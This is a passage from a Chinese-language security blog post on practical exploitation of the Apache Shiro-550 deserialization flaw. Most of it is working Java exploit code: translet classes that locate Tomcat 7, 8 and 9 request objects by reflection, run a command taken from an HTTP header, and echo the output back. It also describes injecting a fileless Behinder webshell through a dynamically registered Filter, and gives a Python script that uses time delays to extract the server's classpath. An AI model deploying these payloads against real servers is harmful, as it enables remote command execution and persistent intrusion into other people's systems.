o.getClass().getDeclaredField(&quot;req&quot;);</span><br><span class="line">                            field.setAccessible(true);</span><br><span class="line">                            obj &#x3D; field.get(o);</span><br><span class="line"></span><br><span class="line">                            if(!obj.toString().contains(&quot;null&quot;)) &#123;</span><br><span class="line">                                Request request &#x3D; (Request) obj;</span><br><span class="line">                                String cmd &#x3D; request.getHeader(&quot;cmd&quot;);</span><br><span class="line">                                InputStream in &#x3D; Runtime.getRuntime().exec(cmd).getInputStream();</span><br><span class="line">                                ByteArrayOutputStream byteArrayOutputStream &#x3D; new ByteArrayOutputStream();</span><br><span class="line">                                byte[] buff &#x3D; new byte[1024];</span><br><span class="line">                                int rc &#x3D; 0;</span><br><span class="line">                                while ((rc &#x3D; in.read(buff, 0, 1024)) &gt; 0) &#123;</span><br><span class="line">                                    byteArrayOutputStream.write(buff, 0, rc);</span><br><span class="line">                                &#125;</span><br><span class="line">                                byte[] buf &#x3D; byteArrayOutputStream.toByteArray();</span><br><span class="line">                                ByteChunk bc &#x3D; new ByteChunk();</span><br><span class="line">                                bc.setBytes(buf, 0, buf.length);</span><br><span class="line">                                request.getResponse().doWrite(bc);</span><br><span class="line">                            &#125;</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;catch (Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    @Override</span><br><span class="line">    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException &#123;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    @Override</span><br><span class="line">    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException &#123;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>再来看一下Tomcat 8.5.56和Tomcat 9.0.19。<br>Tomcat 8.5.56可寻找Request的线程名为http-nio-8090-ClientPoller-0、http-nio-8090-ClientPoller-1、http-nio-8090-Acceptor-0和http-nio-8090-AsyncTimeout。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/6.png" alt=""></p>
<p>Tomcat 9.0.19可寻找Request的线程名为http-nio-8090-ClientPoller-0和http-nio-8090-ClientPoller-1。</p>
<p>和Tomcat 7.0.106不同的是，Tomcat 8.5.56和Tomcat 9.0.19默认使用的是NioEndpoint组件，而Tomcat 7.0.106使用的是JIoEndpoint。handler是直接在JIoEndpoint类定义的成员变量，而对于NioEndpoint类中则是在父类的父类AbstractEndpoint中定义的。如果需要通过反射获取关键的Field，可以考虑通过不断遍历父类去获取。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/7.png" alt=""></p>
<p>另外，在Tomcat 7.0.106中org.apache.coyote.Response#doWrite()方法传入的参数类型为ByteChunk类型，而在Tomcat 8.5.56和Tomcat 9.0.19参数类型为ByteBuffer。</p>
<p>Tomcat 8.5.56和Tomcat 9.0.19回显EXP：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><span class="line">import com.sun.org.apache.xalan.internal.xsltc.DOM;</span><br><span class="line">import com.sun.org.apache.xalan.internal.xsltc.TransletException;</span><br><span class="line">import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;</span><br><span class="line">import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;</span><br><span class="line">import com.sun.org.apache.xml.internal.serializer.SerializationHandler;</span><br><span class="line">import java.lang.reflect.Field;</span><br><span class="line">import java.nio.ByteBuffer;</span><br><span class="line">import java.util.ArrayList;</span><br><span class="line">import org.apache.coyote.Request;</span><br><span class="line">import java.io.*;</span><br><span class="line"></span><br><span class="line">public class Tomcat9Echo extends AbstractTranslet &#123;</span><br><span class="line">    public Tomcat9Echo()&#123;</span><br><span class="line">        try &#123;</span><br><span class="line">            ThreadGroup group &#x3D; Thread.currentThread().getThreadGroup();</span><br><span class="line">            Field field &#x3D; group.getClass().getDeclaredField(&quot;threads&quot;);</span><br><span class="line">            field.setAccessible(true);</span><br><span class="line"></span><br><span class="line">            Thread[] threads &#x3D; (Thread[]) field.get(group);</span><br><span class="line"></span><br><span class="line">            for(Thread thread:threads)&#123;</span><br><span class="line">                String name &#x3D; thread.getName();</span><br><span class="line">                if(name.contains(&quot;http&quot;) &amp;&amp; name.contains(&quot;Poller&quot;))&#123;</span><br><span class="line">                    field &#x3D; thread.getClass().getDeclaredField(&quot;target&quot;);</span><br><span class="line">                    field.setAccessible(true);</span><br><span class="line">                    Object obj &#x3D; field.get(thread);</span><br><span class="line"></span><br><span class="line">                    field &#x3D; obj.getClass().getDeclaredField(&quot;this$0&quot;);</span><br><span class="line">                    field.setAccessible(true);</span><br><span class="line">                    obj &#x3D; field.get(obj);</span><br><span class="line"></span><br><span class="line">                    field &#x3D; obj.getClass().getSuperclass().getSuperclass().getDeclaredField(&quot;handler&quot;);</span><br><span class="line">                    field.setAccessible(true);</span><br><span class="line">                    obj &#x3D; field.get(obj);</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">                    field &#x3D; obj.getClass().getDeclaredField(&quot;global&quot;);</span><br><span class="line">                    field.setAccessible(true);</span><br><span class="line">                    obj &#x3D; field.get(obj);</span><br><span class="line"></span><br><span class="line">                    field &#x3D; obj.getClass().getDeclaredField(&quot;processors&quot;);</span><br><span class="line">                    field.setAccessible(true);</span><br><span class="line">                    obj &#x3D; field.get(obj);</span><br><span class="line"></span><br><span class="line">                    ArrayList processors &#x3D; (ArrayList) obj;</span><br><span class="line"></span><br><span class="line">                    for(int m&#x3D;0;m&lt;processors.size();m++)&#123;</span><br><span class="line">                        Object o &#x3D; processors.get(m);</span><br><span class="line">                        if(o !&#x3D; null &amp;&amp; o.getClass().toString().contains(&quot;RequestInfo&quot;))&#123;</span><br><span class="line">                            field &#x3D; o.getClass().getDeclaredField(&quot;req&quot;);</span><br><span class="line">                            field.setAccessible(true);</span><br><span class="line">                            obj &#x3D; field.get(o);</span><br><span class="line"></span><br><span class="line">                            if(!obj.toString().contains(&quot;null&quot;)) &#123;</span><br><span class="line">                                Request request &#x3D; (Request) obj;</span><br><span class="line">                                String cmd &#x3D; request.getHeader(&quot;cmd&quot;);</span><br><span class="line">                                InputStream in &#x3D; Runtime.getRuntime().exec(cmd).getInputStream();</span><br><span class="line">                                ByteArrayOutputStream byteArrayOutputStream &#x3D; new ByteArrayOutputStream();</span><br><span class="line">                                byte[] buff &#x3D; new byte[1024];</span><br><span class="line">                                int rc &#x3D; 0;</span><br><span class="line">                                while ((rc &#x3D; in.read(buff, 0, 1024)) &gt; 0) &#123;</span><br><span class="line">                                    byteArrayOutputStream.write(buff, 0, rc);</span><br><span class="line">                                &#125;</span><br><span class="line">                                byte[] buf &#x3D; byteArrayOutputStream.toByteArray();</span><br><span class="line"></span><br><span class="line">                                request.getResponse().doWrite(ByteBuffer.wrap(buf));</span><br><span class="line">                            &#125;</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125;catch (Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    @Override</span><br><span class="line">    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException &#123;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    @Override</span><br><span class="line">    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException &#123;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>综合考虑以上不同版本出现的异同，可以写一个通用大多Tomcat 7,8,9版本的回显EXP：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br></pre></td><td class="code"><pre><span class="line">import com.sun.org.apache.xalan.internal.xsltc.DOM;</span><br><span class="line">import com.sun.org.apache.xalan.internal.xsltc.TransletException;</span><br><span class="line">import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;</span><br><span class="line">import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;</span><br><span class="line">import com.sun.org.apache.xml.internal.serializer.SerializationHandler;</span><br><span class="line">import java.lang.reflect.Field;</span><br><span class="line">import java.util.ArrayList;</span><br><span class="line">import java.io.*;</span><br><span class="line"></span><br><span class="line">public class TomcatEcho extends AbstractTranslet &#123;</span><br><span class="line"></span><br><span class="line">    public TomcatEcho() &#123;</span><br><span class="line">        try &#123;</span><br><span class="line">            ThreadGroup group &#x3D; Thread.currentThread().getThreadGroup();</span><br><span class="line">            Thread[] threads &#x3D; (Thread[]) getObj(group, &quot;threads&quot;);</span><br><span class="line">            label:</span><br><span class="line">            for(Thread thread:threads) &#123;</span><br><span class="line">                String name &#x3D; thread.getName();</span><br><span class="line">                if(name.contains(&quot;http&quot;) &amp;&amp; !name.contains(&quot;exec&quot;)) &#123;</span><br><span class="line">                    ArrayList processors &#x3D; (ArrayList) getObj(getObj(getObj(getObj(getObj(thread, &quot;target&quot;),&quot;this$0&quot;), &quot;handler&quot;), &quot;global&quot;), &quot;processors&quot;);</span><br><span class="line">                    for (int m&#x3D;0; m&lt;processors.size();m++) &#123;</span><br><span class="line">                        Object o &#x3D; processors.get(m);</span><br><span class="line">                        if (o.getClass().toString().contains(&quot;RequestInfo&quot;)) &#123;</span><br><span class="line">                            Object req &#x3D; getObj(o, &quot;req&quot;);</span><br><span class="line">                            if(!req.toString().contains(&quot;null&quot;)) &#123;</span><br><span class="line">                                Object resp &#x3D; req.getClass().getMethod(&quot;getResponse&quot;).invoke(req);</span><br><span class="line">                                String cmd &#x3D; (String)req.getClass().getMethod(&quot;getHeader&quot;, String.class).invoke(req, &quot;X-Protection&quot;);</span><br><span class="line">                                InputStream in &#x3D; Runtime.getRuntime().exec(cmd).getInputStream();</span><br><span class="line">                                ByteArrayOutputStream bs &#x3D; new ByteArrayOutputStream();</span><br><span class="line">                                byte[] buff &#x3D; new byte[1024];</span><br><span class="line">                                int rc &#x3D; 0;</span><br><span class="line">                                while ((rc &#x3D; in.read(buff, 0, 1024)) &gt; 0) &#123;</span><br><span class="line">                                    bs.write(buff, 0, rc);</span><br><span class="line">                                &#125;</span><br><span class="line">                                byte[] buf &#x3D; bs.toByteArray();</span><br><span class="line">                                try &#123;</span><br><span class="line">                                    Class cls &#x3D; Class.forName(&quot;org.apache.tomcat.util.buf.ByteChunk&quot;);</span><br><span class="line">                                    Object bc &#x3D; cls.newInstance();</span><br><span class="line">                                    cls.getDeclaredMethod(&quot;setBytes&quot;, byte[].class, Integer.TYPE, Integer.TYPE).invoke(bc, buf, new Integer(0), new Integer(buf.length));</span><br><span class="line">                                    resp.getClass().getMethod(&quot;doWrite&quot;, cls).invoke(resp, bc);</span><br><span class="line">                                    break label;</span><br><span class="line">                                &#125; catch (NoSuchMethodException e) &#123;</span><br><span class="line">                                    Class cls &#x3D; Class.forName(&quot;java.nio.ByteBuffer&quot;);</span><br><span class="line">                                    Object bc &#x3D; cls.getDeclaredMethod(&quot;wrap&quot;, byte[].class).invoke(cls, buf);</span><br><span class="line">                                    resp.getClass().getMethod(&quot;doWrite&quot;, cls).invoke(resp, bc);</span><br><span class="line">                                    break label;</span><br><span class="line">                                &#125;</span><br><span class="line"></span><br><span class="line">                            &#125;</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125;</span><br><span class="line"></span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br><span class="line"></span><br><span class="line">        &#125; catch (Exception e) &#123;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private static Object getObj(Object obj, String str) throws Exception &#123;</span><br><span class="line">        Class cls &#x3D; obj.getClass();</span><br><span class="line">        Field field &#x3D; null;</span><br><span class="line">        while (true) &#123;</span><br><span class="line">            try &#123;</span><br><span class="line">                field &#x3D; cls.getDeclaredField(str);</span><br><span class="line">                break;</span><br><span class="line">            &#125; catch (NoSuchFieldException e) &#123;</span><br><span class="line">                cls &#x3D; cls.getSuperclass();</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">        if (field !&#x3D;null )&#123;</span><br><span class="line">            field.setAccessible(true);</span><br><span class="line">            return field.get(obj);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            throw new NoSuchFieldException(str);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    @Override</span><br><span class="line">    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException &#123;</span><br><span class="line">    &#125;</span><br><span class="line">    @Override</span><br><span class="line">    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException &#123;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Shiro反序列化漏洞利用成功构造回显：<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/8.png" alt=""></p>
<h3 id="3-写入无文件webshell"><a href="#3-写入无文件webshell" class="headerlink" title="3.写入无文件webshell"></a>3.写入无文件webshell</h3><p>关于无文件webshell，总结了网上大佬的思路，主要可以分为几种：<br>• 基于Servlet规范，通过动态注册Servlet、Filter、Listener等方式实现无文件webshell。参考<a href="https://xz.aliyun.com/t/7388" target="_blank" rel="noopener">《基于tomcat的内存 Webshell 无文件攻击技术》</a><br>• 基于特定框架，如Spring注入controller、Filter等方式实现无文件webshell。参考<a href="https://www.anquanke.com/post/id/198886" target="_blank" rel="noopener">《基于内存 Webshell 的无文件攻击技术研究》</a><br>• 基于Java Instrumemtation，如rebeyong大佬写的memShell。参考<a href="https://www.freebuf.com/articles/web/172753.html" target="_blank" rel="noopener">《利用“进程注入”实现无文件复活 WebShell》</a></p>
<p>实现无文件webshell，具体到Shiro反序列化漏洞的利用需要注意的是在Tomcat中间件下如果生成的payload太长，会超过Tomcat默认的maxHeaderSize大小，导致请求失败。解决方法可以参考<a href="https://mp.weixin.qq.com/s/5iYyRGnlOEEIJmW1DqAeXw" target="_blank" rel="noopener">《Java代码执行漏洞中类动态加载的应用》</a>的思路，通过自定义ClassLoader，将要加载的字节码放在POST请求的参数中，从而避免了直接在Header插入全部payload导致超过长度限制。</p>
<p>如下，通过动态注册Filter实现无文件冰蝎webshell。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/9.png" alt=""></p>
<p>修改冰蝎，对payload下的所有equals方法进行修改，去掉需要依赖jsp的PageContext。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/10.png" alt=""></p>
<p>成功注入无文件冰蝎webshell。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/11.png" alt=""></p>
<h3 id="4-时间延迟获取Web路径写入webshell"><a href="#4-时间延迟获取Web路径写入webshell" class="headerlink" title="4.时间延迟获取Web路径写入webshell"></a>4.时间延迟获取Web路径写入webshell</h3><p>相较前面的三种方法，使用时间延迟算是比较通用的方法了，不需要考虑中间件差异等问题。如下面写了一个比较简单粗暴的二分法时间延迟实现获取classpath。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line">def BinarySearch(target, index, left, right, lowerStdLimit):</span><br><span class="line">    while True:</span><br><span class="line">        mid &#x3D; (left + right)&#x2F;2</span><br><span class="line">        if mid &#x3D;&#x3D; left:</span><br><span class="line">            return chr(mid)</span><br><span class="line">            break</span><br><span class="line">        code1 &#x3D; &quot;&quot;&quot;</span><br><span class="line">String var1 &#x3D; Thread.currentThread().getContextClassLoader().getResource(&quot;&quot;).getPath();</span><br><span class="line">int a &#x3D; (int) var1.charAt(%d);</span><br><span class="line">if (a &lt; %d) &#123;</span><br><span class="line">    Thread.currentThread().sleep(5000L);</span><br><span class="line">&#125;</span><br><span class="line">&quot;&quot;&quot; % (index, mid)</span><br><span class="line"></span><br><span class="line">        code2 &#x3D; &quot;&quot;&quot;</span><br><span class="line">String var1 &#x3D; Thread.currentThread().getContextClassLoader().getResource(&quot;&quot;).getPath();</span><br><span class="line">int a &#x3D; (int) var1.charAt(%d);</span><br><span class="line">if (a &lt; %d) &#123;</span><br><span class="line">    Thread.currentThread().sleep(0000L);</span><br><span class="line">&#125;</span><br><span class="line">        &quot;&quot;&quot; % (index, mid)</span><br><span class="line"></span><br><span class="line">        code1_base64 &#x3D; base64.b64encode(code1)</span><br><span class="line">        re_value1 &#x3D; poc(code1_base64)</span><br><span class="line"></span><br><span class="line">        code2_base64 &#x3D; base64.b64encode(code2)</span><br><span class="line">        re_value2 &#x3D; poc(code2_base64)</span><br><span class="line"></span><br><span class="line">        time1 &#x3D; resp_time(target, re_value1)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">        if time1 &gt; lowerStdLimit:</span><br><span class="line">            time2 &#x3D; resp_time(target, re_value2)</span><br><span class="line">            if time2 &lt;&#x3D; lowerStdLimit:</span><br><span class="line">                right &#x3D; mid</span><br><span class="line">            else:</span><br><span class="line">                left &#x3D; mid</span><br><span class="line">        else:</span><br><span class="line">            left &#x3D; mid</span><br></pre></td></tr></table></figure>
<p>通过时间盲注获取classpath。<br><img src="https://changxia-1257751451.cos.ap-chengdu.myqcloud.com/Shiro-550-4/12.png" alt=""></p>

  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/about/">关于</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x1-前言"><span class="toc-number">1.</span> <span class="toc-text">0x1 前言</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x2-解决方法"><span class="toc-number">2.</span> <span class="toc-text">0x2 解决方法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-定位Web目录写入文件"><span class="toc-number">2.1.</span> <span class="toc-text">1.定位Web目录写入文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-构造回显"><span class="toc-number">2.2.</span> <span class="toc-text">2.构造回显</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-写入无文件webshell"><span class="toc-number">2.3.</span> <span class="toc-text">3.写入无文件webshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-时间延迟获取Web路径写入webshell"><span class="toc-number">2.4.</span> <span class="toc-text">4.时间延迟获取Web路径写入webshell</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/" target="_blank" rel="noopener"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&text=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&is_video=false&description=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=Shiro反序列化漏洞笔记四（实战篇）&body=Check out this article: http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&title=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&name=Shiro反序列化漏洞笔记四（实战篇）&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://changxia3.com/2020/12/27/Shiro%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0%E5%9B%9B%EF%BC%88%E5%AE%9E%E6%88%98%E7%AF%87%EF%BC%89/&t=Shiro反序列化漏洞笔记四（实战篇）" target="_blank" rel="noopener"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> 菜单</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> 目录</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> 分享</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> 返回顶部</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2020-2024
    长夏
  </div>
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">首页</a></li>
         
          <li><a href="/archives/">归档</a></li>
         
          <li><a href="/categories/">分类</a></li>
         
          <li><a href="/about/">关于</a></li>
